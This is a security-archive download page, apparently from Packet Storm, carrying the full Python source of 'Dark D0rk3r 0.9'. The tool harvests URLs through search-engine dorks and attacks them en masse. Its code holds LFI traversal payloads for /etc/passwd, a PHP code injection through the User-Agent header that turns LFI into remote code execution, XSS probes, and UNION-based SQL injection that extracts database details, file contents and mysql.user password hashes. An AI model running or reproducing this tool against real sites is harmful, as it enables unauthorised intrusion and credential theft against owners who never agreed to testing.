exploit the possibilities

Dark D0rk3r 0.9

Dark D0rk3r 0.9
Posted Oct 11, 2012
Authored by baltazar

Dark D0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors.

Changes: Various updates.
tags | tool, local, scanner, sql injection, python, file inclusion
systems | unix
MD5 | 8fcb9c9d36b9c64d0c3398581ffc690c

Dark D0rk3r 0.9

Change Mirror Download
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : darkd0rk3r.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.9
# greetz for all members of ex darkc0de.com, ljuska.org
#

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W = "\033[0m";
R = "\033[31m";
G = "\033[32m";
O = "\033[33m";
B = "\033[34m";


# Banner
def logo():
print R+"\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 08/2012 darkd0rk3r.py v.0.9 |"
print "| b4ltazar.us |"
print "| |"
print "|---------------------------------------------------------------|\n"
print W

if sys.platform == 'linux' or sys.platform == 'linux2':
subprocess.call("clear", shell=True)
logo()

else:
subprocess.call("cls", shell=True)
logo()

log = "darkd0rk3r-sqli.txt"
logfile = open(log, "a")
lfi_log = "darkd0rk3r-lfi.txt"
lfi_log_file = open(lfi_log, "a")
rce_log = "darkd0rk3r-rce.txt"
rce_log_file = open(rce_log, "a")
xss_log = "darkd0rk3r-xss.txt"
xss_log_file = open(xss_log, "a")

threads = []
finallist = []
vuln = []
col = []
darkurl = []
arg_end = "--"
arg_eva = "+"
colMax = 15 # Change this at your will
gets = 0
file = "/etc/passwd"
timeout = 300
socket.setdefaulttimeout(timeout)


lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]

sqlerrors = {'MySQL': 'error in your SQL syntax',
'MiscError': 'mysql_fetch',
'MiscError2': 'num_rows',
'Oracle': 'ORA-01756',
'JDBC_CFM': 'Error Executing Database Query',
'JDBC_CFM2': 'SQLServer JDBC Driver',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
'MS-Access_JETdb': 'Microsoft JET Database',
'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
'Server Error' : 'Server Error',
'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
'Invalid Querystring' : 'Invalid Querystring',
'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
'VBScript Runtime' : 'VBScript Runtime',
'ADODB.Field' : 'ADODB.Field',
'BOF or EOF' : 'BOF or EOF',
'ADODB.Command' : 'ADODB.Command',
'JET Database' : 'JET Database',
'mysql_fetch_array()' : 'mysql_fetch_array()',
'Syntax error' : 'Syntax error',
'mysql_numrows()' : 'mysql_numrows()',
'GetArray()' : 'GetArray()',
'FetchRow()' : 'FetchRow()',
'Input string was not in a correct format' : 'Input string was not in a correct format'}


header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']


domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}




def search(inurl, maxc):
urls = []
for site in sitearray:
page = 0
try:
while page < int(maxc):
jar = cookielib.FileCookieJar("cookies")
query = inurl+"+site:"+site
results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
request_web =urllib2.Request(results_web)
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
stringreg = re.compile('(?<=href=")(.*?)(?=")')
names = stringreg.findall(text)
page += 1
for name in names:
if name not in urls:
if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
pass
elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
pass
else:
urls.append(name)
percent = int((1.0*page/int(maxc))*100)
urls_len = len(urls)
sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
sys.stdout.flush()
except(KeyboardInterrupt):
pass
tmplist = []
print "\n\n[+] URLS (unsorted): ",len(urls)
for url in urls:
try:
host = url.split("/",3)
domain = host[2]
if domain not in tmplist and "=" in url:
finallist.append(url)
tmplist.append(domain)

except:
pass
print "[+] URLS (sorted) : ",len(finallist)
return finallist


class injThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts
self.fcount = 0
self.check = True
threading.Thread.__init__(self)

def run (self):
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicINJ(url)
else:
break
except(KeyboardInterrupt,ValueError):
pass
self.fcount+=1

def stop(self):
self.check = False

class lfiThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts
self.fcount = 0
self.check = True
threading.Thread.__init__(self)

def run (self):
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicLFI(url)
else:
break
except(KeyboardInterrupt,ValueError):
pass
self.fcount+=1

def stop(self):
self.check = False

class xssThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts
self.fcount = 0
self.check = True
threading.Thread.__init__(self)

def run (self):
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicXSS(url)
else:
break
except(KeyboardInterrupt,ValueError):
pass
self.fcount+=1

def stop(self):
self.check = False


def ClassicINJ(url):
EXT = "'"
host = url+EXT
try:
source = urllib2.urlopen(host).read()
for type,eMSG in sqlerrors.items():
if re.search(eMSG, source):
print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
logfile.write("\n"+host)
vuln.append(host)
col.append(host)
break


else:
pass
except:
pass


def ClassicLFI(url):
lfiurl = url.rsplit('=', 1)[0]
if lfiurl[-1] != "=":
lfiurl = lfiurl + "="
for lfi in lfis:
try:
check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
if re.findall("root:x", check):
print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
lfi_log_file.write("\n"+lfiurl+lfi)
vuln.append(lfiurl+lfi)
target = lfiurl+lfi
target = target.replace("/etc/passwd","/proc/self/environ")
header = "<? echo md5(baltazar); ?>"
try:
request_web = urllib2.Request(target)
request_web.add_header('User-Agent', header)
text = urllib2.urlopen(request_web)
text = text.read()
if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
rce_log_file.write("\n",target)
vuln.append(target)
except:
pass

except:
pass

def ClassicXSS(url):
for xss in xsses:
try:
source = urllib2.urlopen(url+xss.replace("\n","")).read()
if re.findall("XSS by baltazar", source):
print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
xss_log_file.write("\n"+url+xss)
vuln.append(url+xss)
except:
pass

def injtest():
print B+"\n[+] Preparing for SQLi scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = injThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

def lfitest():
print B+"\n[+] Preparing for LFI - RCE scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = lfiThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

def xsstest():
print B+"\n[+] Preparing for XSS scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z<m):
sliced.append(usearch[int(numthreads)*i+z])
z +=1
thread = xssThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()

menu = True
new = 1
while menu == True:
if new == 1:
threads = []
finallist = []
vuln = []
col = []
darkurl = []

stecnt = 0
for k,v in domains.items():
stecnt += 1
print str(stecnt)+" - "+k
sitekey = raw_input("\nChoose your target : ")
sitearray = domains[domains.keys()[int(sitekey)-1]]


inurl = raw_input('\nEnter your dork : ')
numthreads = raw_input('Enter no. of threads : ')
maxc = raw_input('Enter no. of pages : ')
print "\nNumber of SQL errors :",len(sqlerrors)
print "Number of LFI paths :",len(lfis)
print "Number of XSS cheats :",len(xsses)
print "Number of headers :",len(header)
print "Number of threads :",numthreads
print "Number of pages :",maxc
print "Timeout in seconds :",timeout
print ""

usearch = search(inurl,maxc)
new = 0

print R+"\n[0] Exit"
print "[1] SQLi Testing"
print "[2] SQLi Testing with Column Finder"
print "[3] Retrieve version, user, database (only after option [2])"
print "[4] LFI - RCE Testing"
print "[5] XSS Testing"
print "[6] SQLi and LFI - RCE Testing"
print "[7] SQLi and XSS Testing"
print "[8] LFI - RCE and XSS Testing"
print "[9] SQLi,LFI - RCE and XSS Testing"
print "[10] Save valid urls to file"
print "[11] Print valid urls"
print "[12] Found vuln in last scan"
print "[13] New Scan\n"

chce = raw_input(":")
if chce == '1':
injtest()

if chce == '2':
injtest()
print B+"\n[+] Preparing for Column Finder ..."
print "[+] Can take a while ..."
print "[!] Working ..."
# Thanks rsauron for schemafuzz
for host in col:
print R+"\n[+] Target: ", O+host
print R+"[+] Attempting to find the number of columns ..."
print "[+] Testing: ",
checkfor = []
host = host.rsplit("'", 1)[0]
sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
makepretty = ""
for x in xrange(0, colMax):
try:
sys.stdout.write("%s," % (x))
sys.stdout.flush()
darkc0de = "dark"+str(x)+"c0de"
checkfor.append(darkc0de)
if x > 0:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
gets += 1
source = urllib2.urlopen(finalurl).read()
for y in checkfor:
colFound = re.findall(y, source)
if len(colFound) >= 1:
print "\n[+] Column length is:", len(checkfor)
nullcol = re.findall(("\d+"), y)
print "[+] Found null column at column #:", nullcol[0]
for z in xrange(0, len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
print "[+] SQLi URL:", site+arg_end
site = site.replace(","+nullcol[0]+",",",darkc0de,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
site = site.replace(","+nullcol[0],",darkc0de")
print "[+] darkc0de URL:", site
darkurl.append(site)
print "[-] Done!\n"
break

except(KeyboardInterrupt, SystemExit):
raise
except:
pass

print "\n[!] Sorry column length could not be found\n"
###########

if chce == '3':
print B+"\n[+] Gathering MySQL Server Configuration..."
for site in darkurl:
head_URL = site.replace("darkc0de", "concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print R+"\n[+] Target:", O+site
while 1:
try:
gets += 1
source = urllib2.urlopen(head_URL).read()
match = re.findall("\x1e\x1e\S+", source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print W+"\n\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
version = version[0]
#break

load = site.replace("darkc0de", "load_file(0x2f6574632f706173737764)")
source = urllib2.urlopen(load).read()
if re.findall("root:x", source):
load = site.replace("darkc0de","concat_ws(char(58),load_file(0x"+file.encode("hex")+"),0x62616c74617a6172)")
source = urllib2.urlopen(load).read()
search = re.findall("baltazar",source)
if len(search) > 0:
print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "load_file(0x"+file.encode("hex")+")")

load = site.replace("dakrc0de", "concat_ws(char(58),user,password,0x62616c74617a6172)")+arg_eva+"from"+arg_eva+"mysql.user"
source = urllib2.urlopen(load).read()
if re.findall("baltazar", source):
print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "concat_ws(char(58),user,password)")+arg_eva+"from"+arg_eva+"mysql.user"
break

else:
print "[-] No Data Found"
break

except(KeyboardInterrupt, SystemExit):
raise


if chce == '4':
lfitest()

if chce == '5':
xsstest()

if chce == '6':
injtest()
lfitest()

if chce == '7':
injtest()
xsstest()

if chce == '8':
lfitest()
xsstest()

if chce == '9':
injtest()
lfitest()
xsstest()

if chce == '10':
print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
listname = raw_input("Filename: ")
list_name = open(listname, "w")
finallist.sort()
for t in finallist:
list_name.write(t+"\n")
list_name.close()
print "Urls saved, please check", listname

if chce == '11':
print W+"\nPrinting valid urls:\n"
finallist.sort()
for t in finallist:
print B+t

if chce == '12':
print B+"\nVuln found ",len(vuln)

if chce == '13':
new = 1
print W+""

if chce == '0':
print R+"\n[-] Exiting ..."
mnu = False
print W
sys.exit(1)



Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close